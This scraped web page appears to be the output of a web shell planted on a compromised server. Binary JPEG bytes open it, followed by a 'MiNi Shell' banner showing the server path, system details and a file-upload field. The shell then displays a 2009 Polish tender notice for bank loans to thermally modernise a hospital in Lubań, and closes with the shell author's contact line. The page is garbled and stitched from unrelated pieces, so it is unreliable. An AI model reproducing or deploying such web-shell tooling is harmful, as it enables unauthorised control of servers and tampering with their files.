JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090508/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090508/138794-N-2009.html

<p class="kh_header"><b>Lubań: Finansowanie przedsięwzięcia polegającego na termomodernizacji kompleksu budynków szpitala (CPV - usługi udzielania kredytu 66113000-5)</b><br>
<b>Numer ogłoszenia: 138794 - 2009; data zamieszczenia: 08.05.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Niepubliczny Zakład Opieki Zdrowotnej Łużyckie Centrum Medyczne w Lubaniu Sp.zo.o. , ul. Zawidowska 4, 59-800 Lubań, woj. dolnośląskie, tel. 075 7210106, faks 075 7210107.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.lcm-luban.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: spółka prawa handlowego będąca własnością samorządu terytorialnego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Finansowanie przedsięwzięcia polegającego na termomodernizacji kompleksu budynków szpitala (CPV - usługi udzielania kredytu 66113000-5).</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest udzielenie i obsługa kredytu bankowego złotowego długoterminowego w wysokości 1 434 807,00 zł słownie: jeden milion czterysta trzydzieści cztery tysiące osiemset siedem złotych wraz z premią termomodernizacyjną na realizację przedsięwzięć termomdernizacyjnych kompleksu budynków szpitala  zgodnie z Ustawą z dnia 21 listopada 2008 roku o wspieraniu termomodernizacji i remontów (Dz. U. z 2008 r., Nr 233, poz. 1459) oraz udzielenie kredytu pomostowego w wysokości  1 204 274,00 zł słownie: jeden milion dwieście cztery tysiące dwieście siedemdziesiąt cztery złote, z możliwością wydania promesy.  
2. Wspólny Słownik Zamówień (CPV): usługi udzielania kredytu 66113000-5.
3. Dla każdego niżej wymienionego zadania zostanie zawarta odrębna umowa kredytowa:
3.1. Zadanie 1.: Udzielenie i obsługa kredytu bankowego złotowego długoterminowego wraz z premią termomodernizacyjną na realizację przedsięwzięć termomdernizacyjnych kompleksu budynków szpitala zgodnie z Ustawą z dnia 21 listopada 2008 roku o wspieraniu termomodernizacji i remontów (Dz. U. z 2008 r., Nr 233, poz. 1459).
3.2. Zadanie 2.: Udzielenie kredytu pomostowego z możliwością wydania promesy.
4. Opis zadania 1.:
4.1. Okres kredytowania 10 lat od dnia podpisania umowy.
4.2. Udzielenie kredytu przez bank kredytujący nastąpi zgodnie z trybem określonym przepisami Ustawy z dnia 21 listopada 2008 roku o wspieraniu termomodernizacji i remontów (Dz. U. z 2008 r., Nr 233, poz. 1459), w  transzach.
4.3. Oprocentowanie kredytu - zmienne. Koszty związane z prowadzeniem rachunku kredytowego oraz wszelkie opłaty związane z obsługą kredytu Wykonawca jest zobowiązany wliczyć do marży w taki sposób, aby skalkulować i przedstawić jedną stawkę procentową, której wysokość jest wiążąca w całym okresie kredytowania.
4.4. Odsetki naliczane będą miesięcznie, od faktycznie wykorzystanych środków. Do obliczenia kwoty odsetek przyjmuje się rzeczywistą liczbę dni wykorzystania kredytu w stosunku do 365 dni w roku.
4.5. Planowany termin zakończenia zadania 31 sierpnia 2010 r.
4.6. Rozpoczęcie spłaty kapitału od dnia 30 września 2010 r. w równych ratach miesięcznych, zaokrąglonych do pełnego złotego, ostania rata wyrównawcza.
4.7. Spłata odsetek oraz kapitału będzie następowała w okresach miesięcznych w ostatnim dniu każdego miesiąca kalendarzowego. 
4.8. Wykonawca przyjmuje za podstawę naliczenia odsetek od udzielonego kredytu stawkę WIBOR 1M, powiększoną o marżę banku.
4.9. Marża nie może ulec podwyższeniu przez cały okres kredytowania. Dla umożliwienia oceny, ceny/kosztu oferty należy przyjąć stawkę WIBOR 1M z dnia 30 kwietnia 2009 r.
4.10. Kwota kredytu będzie wykorzystana w transzach, o terminie Zamawiający będzie informował z 2 - dniowym wyprzedzeniem poprzez złożenie pisemnej dyspozycji w Banku.
4.11. Prowizja - liczona jako % od kwoty udzielonego kredytu, płatna najpóźniej w dniu uruchomienia pierwszej transzy, z własnych środków Zamawiającego. Prowizja musi zawierać w sobie wszystkie opłaty, które związane są z udzieleniem kredytu. Prowizja w wysokości 0,6 % dla BGK z tytułu kwoty przyznanej premii termomoderniazacyjnej nie wlicza się w koszt kredytu. 
4.12. Zamawiający zastrzega sobie prawo do rezygnacji z wykorzystania w całości lub części kredytu.
4.13. Zamawiający zastrzega możliwość wcześniejszej spłaty części kredytu. 
4.14. Zamawiający zobowiązuje się do podpisania oświadczenia o poddaniu się egzekucji na podstawie art. 97 ust. 1 i 2 ustawy z dnia 29 sierpnia 1997 r. Prawo bankowe (Dz. U. z 1997 r. Nr 140, poz. 939)  na formularzu udostępnionym przez bank, którego oferta została wybrana.
4.15. Uruchomienie kredytu nie będzie wymagało składania odrębnego wniosku kredytowego.
4.16. Zabezpieczeniem kredytu będzie weksel, hipoteka ustanowiona na nieruchomościach zabudowanych położonych w Lubaniu przy ul. Zawidowskiej 3 b i 4 b, w granicach działek Nr 65/34 i 65/37, dla których prowadzona jest księga wieczysta  Nr KW 31713, wraz z cesją praw z polisy ubezpieczeniowej oraz pełnomocnictwo do rachunku pomocniczego otwartego u wyłonionego Wykonawcy, służącego do obsługi wnioskowanych kredytów. Koszty związane z ustanowieniem zabezpieczenia kredytu ponosi Zamawiający.
5. Opis zadania 2.:
5.1. Okres kredytowania:  1 rok od podpisania umowy, promesa ważna 6 miesięcy.
5.2. Oprocentowanie kredytu - zmienne. Koszty związane z prowadzeniem rachunku kredytowego oraz wszelkie opłaty związane z obsługą kredytu Wykonawca jest zobowiązany wliczyć do marży w taki sposób, aby skalkulować i przedstawić jedną stawkę procentową, której wysokość jest wiążąca w całym okresie kredytowania.
5.3. Odsetki naliczane będą miesięcznie, od faktycznie wykorzystanych środków. Do obliczenia kwoty odsetek przyjmuje się rzeczywistą liczbę dni wykorzystania kredytu w stosunku do 365 dni w roku.
5.4. Spłata odsetek będzie następowała w okresach miesięcznych w ostatnim dniu każdego miesiąca kalendarzowego.
5.5. Wykonawca przyjmuje za podstawę naliczenia odsetek od udzielonego kredytu stawkę WIBOR 1M, powiększoną o marżę banku.
5.6. Marża nie może ulec podwyższeniu przez cały okres kredytowania. Dla umożliwienia oceny,
ceny/kosztu oferty należy przyjąć stawkę WIBOR 1M z dnia 30 kwietnia 2009 r.
5.7. Kwota kredytu będzie w całości postawiona do dyspozycji w terminie 7 dni od podpisania umowy.
5.8. Spłata kapitału nastąpi jednorazowo w ciągu jednego roku od podpisania umowy.
5.9. Prowizja - liczona jako % od kwoty udzielonego kredytu, płatna najpóźniej w dniu uruchomienia pierwszej transzy, z własnych środków Zamawiającego. Prowizja musi zawierać w sobie wszystkie opłaty, które związane są z uruchomieniem kredytu.
5.10. Zamawiający zastrzega sobie prawo do rezygnacji z wykorzystania w całości lub części kredytu.
5.11. Zamawiający zastrzega możliwość wcześniejszej spłaty części kredytu. 
5.12. Zamawiający zobowiązuje się do podpisania oświadczenia o poddaniu się egzekucji na podstawie art. 97 ust. 1 i 2 ustawy z dnia 29 sierpnia 1997 r. Prawo bankowe (Dz. U. z 1997 r. Nr 140, poz. 939)  na formularzu udostępnionym przez bank, którego oferta została wybrana.
5.13. Uruchomienie kredytu nie będzie wymagało składania odrębnego wniosku kredytowego.
5.14. Zabezpieczeniem kredytu będzie weksel, hipoteka ustanowiona na nieruchomościach zabudowanych położonych w Lubaniu przy ul. Zawidowskiej 3 b i 4 b, w granicach działek Nr 65/34 i 65/37, dla których prowadzona jest księga wieczysta  Nr KW 31713, wraz z cesją praw z polisy ubezpieczeniowej oraz pełnomocnictwo do rachunku pomocniczego otwartego u wyłonionego Wykonawcy, służącego do obsługi wnioskowanych kredytów. Koszty związane z ustanowieniem zabezpieczenia kredytu ponosi Zamawiający.
6. Zamawiający, na pisemny wniosek Wykonawcy udostępni dokumenty formalno-prawne Spółki, dokumenty niezbędne do dokonania oceny sytuacji finansowej Spółki przez bank, oraz dokumenty związane z zabezpieczeniem przyszłego kredytu.
7. Wykonawca wraz z ofertą złoży projekt umowy (dla każdego zadania odrębna umowa kredytowa) uwzględniający istotne warunki wymagane przez Zamawiającego opisane w pkt. 23 SIWZ..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 66.11.30.00-5.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 120.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1.W postępowaniu mogą wziąć udział wykonawcy, którzy spełniają następujące warunki: 
1.1. Posiadają uprawnienia do wykonywania działalności lub czynności, w zakresie objętym niniejszym zamówieniem, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień. 
1.2. Posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonywania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia. 
1.3. Znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia.
1.4. Nie podlegają wykluczeniu z postępowania o udzielenie zamówienia. 
2. Zamawiający, na podstawie złożonych przez Wykonawcę dokumentów dokona oceny spełniania warunków podmiotowych według spełnia - nie spełnia. Nie spełnienie chociażby jednego warunku skutkować będzie wykluczeniem Wykonawcy z postępowania. Ofertę Wykonawcy wykluczonego z postępowania uznaje się za odrzuconą..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1. W celu potwierdzenia spełniania warunków udziału w postępowaniu Wykonawcy zobowiązani są do przedstawienia w ofercie następujących oświadczeń lub dokumentów: 
1.1. Podpisane oświadczenie Wykonawcy o spełnianiu warunków udziału w postępowaniu wg załączonego wzoru (wzór załącznik Nr 2 do SIWZ). 
1.2. Koncesje, zezwolenia lub licencje, jeżeli ustawy nakładają obowiązek posiadania koncesji, zezwolenia lub licencji na podjęcie działalności gospodarczej w zakresie objętym zamówieniem publicznym.
1.3. Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. 
1.4. Aktualne zaświadczenie właściwego naczelnika Urzędu Skarbowego oraz właściwego oddziału ZUS potwierdzające odpowiednio, że nie zalega on z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne lub społeczne lub zaświadczenie, że uzyskał zgodę na zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymania w całości wykonania decyzji właściwego organu - wystawionych nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
1.5. Pisemne zobowiązanie innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia, jeżeli Wykonawcy przedstawili pisemne zobowiązanie innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia.
1.6. Pełnomocnictwo do reprezentowania Wykonawcy o ile ofertę składa pełnomocnik.
1.7. Projekt umowy kredytowej (dla każdego zadania odrębny projekt umowy kredytowej).
2. Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczpospolitej Polskiej, zamiast dokumentu, o którym mowa w pkt 1.3., składa dokument lub dokumenty, wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że:
2.1. Nie otwarto jego likwidacji ani nie ogłoszono upadłości - dokument powinien być wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
3. Jeżeli w kraju pochodzenia osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentu/ -ów, o których mowa w pkt 2., zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania. Dokument powinien być wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
4. Wymagania w stosunku do podmiotów ubiegających się wspólnie o udzielenie zamówienia: 
4.1. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia zobowiązani są do złożenia wraz z ofertą pełnomocnictwa do reprezentowania wszystkich Wykonawców wspólnie ubiegających się o udzielenie zamówienia. 
4.2. Wymagane oświadczenia i dokumenty wskazane w pkt. od 1.1. do 1.6., powinny być złożone przez każdego z Wykonawców wspólnie ubiegających się o udzielenie zamówienia..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.lcm-luban.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Niepubliczny Zakład Opieki Zdrowotnej Łużyckie Centrum Medyczne w Lubaniu Sp. z o.o., ul. Zawidowska 4, 59-800 Lubań.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 22.05.2009 godzina 08:30, miejsce: Niepubliczny Zakład Opieki Zdrowotnej Łużyckie Centrum Medyczne w Lubaniu Sp. z o.o., ul. Zawidowska 4, 59-800 Lubań,Sekretariat Prezesa Zarządu Spółki.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com